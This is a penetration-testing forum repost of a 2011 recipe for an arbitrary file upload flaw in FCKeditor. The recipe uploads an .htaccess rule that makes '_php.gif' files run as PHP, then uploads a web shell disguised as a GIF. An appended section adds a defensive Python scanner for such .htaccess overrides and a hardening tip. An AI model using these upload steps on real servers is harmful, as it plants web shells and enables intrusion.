China Network Penetration Testing Alliance

Title: Upload vulnerability in all PHP versions of FCKeditor

Author: admin    Time: 2013-10-27 17:25
Author: Anonymous    Source: compiled by this site    Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all version Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name “shell.php.gif” changes to “shell_php.gif” automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now shell is available from server.
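
A defender-side check for the condition this post relies on, as an added example that is not part of the original post: it walks an upload directory for .htaccess files that map files to the PHP handler and lists the uploaded files each rule would cover. The function names and the sample tree are constructed for illustration, and Python's re module only approximates Apache's regex matching.

```python
import os
import re
import tempfile

# Directives that can map a file to the PHP handler from inside a .htaccess file.
HANDLER_RE = re.compile(r'^\s*(SetHandler|AddHandler|AddType)\b.*php', re.I)
FILESMATCH_RE = re.compile(r'^\s*<FilesMatch\s+["\u201c]?(.+?)["\u201d]?\s*>', re.I)

def affected_files(dirpath, pattern):
    """Files at or below dirpath whose name matches the FilesMatch regex."""
    try:
        rx = re.compile(pattern) if pattern else None
    except re.error:
        rx = None  # pattern Python cannot parse: list every file instead
    hits = [os.path.relpath(os.path.join(sub, name), dirpath)
            for sub, _dirs, files in os.walk(dirpath) for name in files
            if name != ".htaccess" and (rx is None or rx.search(name))]
    return sorted(hits)

def scan_upload_tree(root):
    """Report every PHP handler override set by a .htaccess file under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        ht_path = os.path.join(dirpath, ".htaccess")
        with open(ht_path, encoding="utf-8", errors="replace") as fh:
            pattern = None  # regex of the enclosing <FilesMatch>, if any
            for line in fh:
                opened = FILESMATCH_RE.match(line)
                if opened:
                    pattern = opened.group(1)
                elif line.strip().lower() == "</filesmatch>":
                    pattern = None
                elif HANDLER_RE.match(line):
                    findings.append({"htaccess": ht_path, "pattern": pattern,
                                     "directive": line.strip(),
                                     "affected": affected_files(dirpath, pattern)})
    return findings

def demo():
    """Constructed sample tree: a handler-override .htaccess and two images."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, ".htaccess"), "w") as fh:
            fh.write('<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n')
        for name in ("shell_php.gif", "photo.gif"):
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(b"GIF89a")  # placeholder bytes, not a real image
        return scan_upload_tree(root)
```

Setting AllowOverride None for the upload directory in the main server configuration makes Apache ignore .htaccess files placed there, so a finding from this scan also indicates that overrides are still enabled for that path.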






Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2